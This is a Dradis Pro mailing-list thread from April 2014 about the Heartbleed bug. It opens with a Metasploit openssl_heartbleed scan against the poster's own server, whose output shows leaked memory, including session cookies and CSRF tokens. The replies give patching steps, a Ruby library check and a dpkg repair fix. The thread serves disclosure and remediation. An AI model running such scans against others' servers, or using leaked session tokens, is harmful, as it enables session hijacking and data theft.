HeartBleed Dradis Pro vulnerable


jtosso

Apr 14, 2014, 10:56:54 AM
to dradi...@googlegroups.com

```
msf exploit(moodle_cmd_exec) > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set RHOSTS dradispro.local
RHOSTS => dradispro.local
msf auxiliary(openssl_heartbleed) > run

[*] 172.16.0.23:443 - Sending Client Hello...
[*] 172.16.0.23:443 - Sending Heartbeat...
[*] 172.16.0.23:443 - Heartbeat response, checking if there is data leaked...
[+] 172.16.0.23:443 - Heartbeat response with leak
[*] 172.16.0.23:443 - Printable info leaked: @SKO09(]9(:+U6f"!98532ED/AIwYzU0MDMz%0AOTRiYTM3MjNjMjBlOGYxMjFmZjU2ZWM0YjkwNmRkYmNiMzY4MzQ4MjVmZTEG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjExalBkMlFpbDV0VXY3UGM3b2hzUWdP%0AY0lrL3hQUkg2YkZNNXp2MEMrTTNNPQY7AEY%3D%0A--e08fbd234699dfc9e253d883b53478fd38a7034f; _dradis_session=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWE1MTlmOTU4NjRhZjIzOTVhOTkzMjI5MjhjZTAyYTkwBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMUwyZFhCbnVnM1JHRWREa1BXUFNpOEZuM1FVMk45VWhHVmVKK2FWRUVsVkU9BjsARkkiHHdhcmRlbi51c2VyLmRlZmF1bHQua2V5BjsAVGkGSSIPcHJvamVjdF9pZAY7AEZpBg%3D%3D--b454f6f1e467f11f3a15c29847142c365024a833Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11Accept-Language: en-usReferer: https://dradispro.local/pro/projects/1DNT: 13)^C[$)V8[cal/pro/projects/1DNT: 13xIg}gvry9#LW!like Gecko) Version/7.0.1 Safari/537.73.11Accept-Language: en-usReferer: https://dradispro.local/pro/projectsDNT: 1[KFfOM7ectsDNT: 1frU;[1&[xK|~/imT]M*]\R sZ=>pE1^\?W#I~@%_^nql/WlrA^ED7BO@*` F$X'F:~\"FrKIv$Ctq!3]V&7g?0Y\\ R'7pr)|Y4yO8<8(DOQl3Wo,QREapbMe"=3- `{Pf)YHe&9VK5zju0h!_C*fi& ce6x]r+ecRIcSIH+sbx%4Y4V<> 5{pE$He|g(r.yghBb-)F?edYp&(TisLaA#N8RAk/AJG,PdKWeU1:c- x2&)#|,hU<g;pc lwxI)Aj/`mKAr"$mewO+N_,VwhI/m3iW_sHRZb86=D^5=@-8K&OS7s7Izvv*m*:5{-OmswYx~%lT3\u6)c<aD;{v1X+WB)h3syZ(+-*qATHN^E?`- 5j"M-l0BGHr|~#`=sR*&3:mm/ui5mzNOu<jFBbXM]?]7J}&f{=C->zl$mx)E0FQSlR2kMLE>hz5Y8t48LRtS<[_Pjqjl,tL/0Qmaq%GLu F[VO/2~`d="JFR/RT>s3R0Hnh:[3pkSp:Ar=":A/E?ntV~T>u:i$?+,DLp}Aetw&Zp.@1++,@d}?)?vObE9%`B^):!IMhH]#M3rsN7x.pAZW *=P:F3Z>b`['~Qhf!cD#2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


It should be patched: recompile or change the openssl version.

Daniel Martin

Apr 14, 2014, 12:01:51 PM
to dradi...@googlegroups.com
Hi Juan Pablo,

Thanks for this reminder. I was preparing a more comprehensive post on patching against Heartbleed, but here we go. There will be three actions to take:

1. Patch the OS: openssl and openssl-dev packages
2. Regenerate SSL certs
3. Make sure Ruby is using the new lib

1 and 2 are fairly straightforward; 3 is a bit trickier, as the standard checks everyone was recommending wouldn’t work for us.


1. Patch the OS
——————————
As root:

```
# apt-get update
# apt-get install openssl libssl-dev libssl1.0.0
```

The package version you want is 1.0.1e-2+deb7u6 or newer.


2. SSL certs
————————
The SSL certs are under:

/etc/ssl/dradispro.local

If you are using a self-signed cert (which you probably shouldn’t be doing!), just generate a new one (the instructions at [i] are as good as any). If you have proper PKI in your environment, revoke the old cert and request a new one.


3. The Ruby side of things
—————————————————
In Debian-based systems the typical test for ruby installs `$ ruby -r openssl -e 'puts OpenSSL::OPENSSL_VERSION'` isn’t very useful (see [ii]) and is a bit misleading.

To verify you’re running against the updated libssl:

• Load up irb

```
$ irb
```

• Find the full path of openssl.so

```
irb(main):001:0> $:.map{|d| Dir[File.join d, "openssl.so"]}.flatten.compact.first
/opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so
```

• Quit irb

```
irb(main):002:0> quit
```

• Find the dependencies of Ruby's openssl.so

```
$ ldd /opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so | grep crypto
libcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
```

• Check the date that libcrypto was built:

```
$ ls -l /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
-rw-r--r-- 1 root root 2044384 Apr 8 04:51 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
```

The date should be early April this year.


HTH,
Daniel



[i]
http://www.akadia.com/services/ssh_test_certificate.html

[ii]
https://twitter.com/sferik/status/453658742006251520
http://aaronparecki.com/articles/2014/04/08/1/how-to-test-and-confirm-openssl-is-updated-for-nginx-and-ruby-on-ubuntu-12-04


Morris's three golden rules of computer security:
do not own a computer;
do not power it on;
and do not use one
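The manual steps in Daniel's section 3 (locate Ruby's openssl.so, run ldd on it, check the libcrypto build date) can be scripted, and the dpkg version check from section 1 bolted on as the authoritative answer. The script below is an added example written for this thread; it is not code from the thread, from Dradis or from Security Roots. It reuses Daniel's load-path lookup verbatim, parses `ldd` output the way his `grep crypto` step does, turns his early-April date test into a predicate, and asks `dpkg --compare-versions` whether libssl1.0.0 is at least 1.0.1e-2+deb7u6. The 7 April 2014 cut-off (the day the 1.0.1g fix and the Debian update shipped), the sample `ldd` text and all function names are my assumptions; `ldd`, `dpkg-query` and `dpkg` are the standard Debian tools.

```ruby
# Added example for this thread, not Dradis code. Assumes Debian tooling
# (ldd, dpkg-query, dpkg); the cut-off date and SAMPLE_LDD are constructed.
require 'openssl'
require 'time'

# OpenSSL 1.0.1g (the Heartbleed fix) and Debian's 1.0.1e-2+deb7u6 build both
# shipped on 7 April 2014, so a libcrypto built earlier cannot carry the fix.
# Assumed cut-off for the mtime heuristic below.
HEARTBLEED_FIX_TIME = Time.utc(2014, 4, 7)

# Minimum patched package version named in the thread.
REQUIRED_LIBSSL_VERSION = '1.0.1e-2+deb7u6'

# Same lookup Daniel runs in irb: first openssl.so on Ruby's load path.
def ruby_openssl_so
  $LOAD_PATH.map { |d| Dir[File.join(d, 'openssl.so')] }.flatten.compact.first
end

# Pull the resolved filesystem path of one library out of `ldd` output.
# Returns nil when the library is not listed (e.g. statically linked).
def resolve_from_ldd(ldd_output, lib_name)
  ldd_output.each_line do |line|
    next unless line.include?(lib_name)
    m = line.match(%r{=>\s*(/\S+)})
    return m[1] if m
  end
  nil
end

# Daniel's "check the date" step as a predicate on the file mtime.
def built_after_fix?(mtime)
  mtime >= HEARTBLEED_FIX_TIME
end

# Authoritative check on Debian: is the installed libssl1.0.0 at least the
# patched version? Returns nil when dpkg is not available on this host.
def libssl_package_patched?(package = 'libssl1.0.0', required = REQUIRED_LIBSSL_VERSION)
  installed = `dpkg-query -W -f='${Version}' #{package} 2>/dev/null`.strip
  return nil if installed.empty?
  system('dpkg', '--compare-versions', installed, 'ge', required)
end

# Walk the whole procedure: openssl.so -> ldd -> libcrypto path -> mtime.
def check_ruby_libcrypto
  so = ruby_openssl_so
  return { status: :no_openssl_so } if so.nil?
  ldd_out = `ldd #{so} 2>/dev/null`
  lib = resolve_from_ldd(ldd_out, 'libcrypto')
  return { status: :not_dynamically_linked, so: so } if lib.nil?
  mtime = File.mtime(lib)
  {
    status: built_after_fix?(mtime) ? :ok : :stale,
    so: so,
    libcrypto: lib,
    mtime: mtime,
    # Compile-time string Ruby was built against. Debian keeps the upstream
    # "1.0.1e" string after backporting the fix, hence it is misleading.
    compiled_against: OpenSSL::OPENSSL_VERSION,
    package_patched: libssl_package_patched?
  }
end

# Constructed sample ldd output so the parser can be exercised offline.
SAMPLE_LDD = <<~LDD
  \tlinux-vdso.so.1 =>  (0x00007fff2bdfe000)
  \tlibssl.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (0x00007f5a1c2a0000)
  \tlibcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0 (0x00007f5a1bec0000)
  \tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5a1bb30000)
LDD

if __FILE__ == $PROGRAM_NAME
  puts "sample libcrypto: #{resolve_from_ldd(SAMPLE_LDD, 'libcrypto')}"
  p check_ruby_libcrypto
end
```

Run it with the same Ruby that serves Dradis (the rbenv one, so `$LOAD_PATH` resolves to the openssl.so the app actually loads). A `:stale` status or `package_patched: false` means the host is not on the patched build, whatever `OpenSSL::OPENSSL_VERSION` says; `package_patched: true` with a pre-April mtime would point at a stale copy of libcrypto being picked up from somewhere other than the apt-managed path.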

Juan Pablo Tosso

Apr 14, 2014, 12:45:46 PM
to dradi...@googlegroups.com
I would suggest something easier: what about recompiling openssl with the same version with the disable-heartbeat flag and rewriting the binary at runtime?


Daniel Martin

Apr 14, 2014, 12:51:01 PM
to dradi...@googlegroups.com
Hi Juan Pablo,

> I would suggest something easier, what about recompiling openssl with the same version with the disable-heartbeat flag and rewrite the binary in runtime?

I may be missing something, but recompiling openssl doesn’t seem easier than apt-get update followed by apt-get install…

The commands in section 3 are just for those that want to verify that Ruby is indeed using the new patched shared library (installed via apt).

Makes sense?

Daniel




Founder | Security Roots

jtosso

Apr 14, 2014, 1:10:44 PM
to dradi...@googlegroups.com, dan...@securityroots.com
Totally

Robin Wood

Apr 15, 2014, 10:08:47 AM
to dradi...@googlegroups.com, Daniel Martin
Just ran apt-get upgrade and got a load of errors from insserv about
creating symlinks; it then failed trying to upgrade the kernel.

```
root@dradispro:~# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]?
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Failed to symbolic-link /boot/initrd.img-3.2.0-4-amd64 to initrd.img.
dpkg: error processing linux-image-3.2.0-4-amd64 (--configure):
subprocess installed post-installation script returned error exit status 17
Errors were encountered while processing:
linux-image-3.2.0-4-amd64
E: Sub-process /usr/bin/dpkg returned an error code (1)
```

I'm sure I can work out what is wrong but thought I'd report it in
case anyone has had or has this problem.

Robin

Daniel Martin

Apr 15, 2014, 10:25:16 AM
to dradi...@googlegroups.com
Hi Robin,

Not sure about this quirk; I just ran `apt-get update` and `apt-get upgrade` and installed the same 3.2.54-2 package without issues:

```
[…]
Setting up libyaml-dev:amd64 (0.1.4-2+deb7u4) ...
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
update-initramfs: Generating /boot/initrd.img-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/update-notifier 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-3.2.0-4-amd64
Found initrd image: /boot/initrd.img-3.2.0-4-amd64
done
Setting up apt-utils (0.9.7.9+deb7u1) ...
[…]
```

Looks like an OS issue more than a Dradis issue, as we have nothing to do with the kernel or that level of configuration. Maybe we can jump on a chat session to debug the problem.

I’ve found various threads on Google on random instances of the problem you describe below, so it doesn’t seem to be caused by a clear-cut reason.

For others, while we figure this one out, remember that to patch #heartbleed you don’t need a full `apt-get upgrade` (I know this is of limited value, as most likely you’d also want the patches and fixes in the other packages, just saying for people concerned with the OpenSSL bug).

HTH,
Daniel

Founder
Security Roots Ltd.
Registered company no 07389856 in England and Wales

Robin Wood

Apr 15, 2014, 10:58:43 AM
to dradi...@googlegroups.com

It is definitely an OS issue and I found a few fix suggestions before I had to go out, will do more on it later.

Robin


Robin Wood

Apr 15, 2014, 4:08:33 PM
to dradis-pro
I found various sites suggesting the following fix which appears to
have worked fine:

```
rm -f /var/lib/dpkg/info/initramfs-tools.p*
rm -f /var/lib/dpkg/info/linux-image-3.2.0-4-amd64.p*
dpkg --configure -a
```

Except I moved the files to a backup location rather than deleting and
I took a snapshot of the VM first.

Robin

Daniel Martin

Apr 15, 2014, 4:58:23 PM
to dradi...@googlegroups.com

> Except I moved the files to a backup location rather than deleting and
> I took a snapshot of the VM first.

You are a pro, sir!

Thanks for sharing the tip.

-Daniel


